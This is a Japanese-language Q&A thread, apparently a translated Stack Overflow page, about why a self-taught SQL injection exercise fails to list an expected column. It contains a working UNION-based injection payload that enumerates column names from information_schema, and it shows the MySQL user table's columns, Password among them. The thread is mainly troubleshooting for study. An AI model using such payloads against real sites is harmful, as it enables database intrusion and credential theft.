0

私は個人教育のためにいくつかの SQLi に取り組んでいますが、同じ問題に直面し続けています。

次の注射剤を使用する場合

bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #

user というテーブルのすべての列名を取得します ->

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin

また、これは私自身が制御した環境であるため、テーブルに UserName という列が含まれていることを知っています。列の結果に表示されないのはなぜですか?

4

2 に答える 2

0

それはうまくいくはずです。クエリを実行しているアカウントが UserName 列にアクセスできることを確認できます。 http://dev.mysql.com/doc/refman/5.0/en/information-schema.html アクセスできる列のみが表示されることを示唆しています。

于 2012-10-25T14:07:51.323 に答える
0

回答: user という名前のテーブルが複数あり、検索する table_scheme を指定しませんでした

于 2012-10-25T14:25:11.043 に答える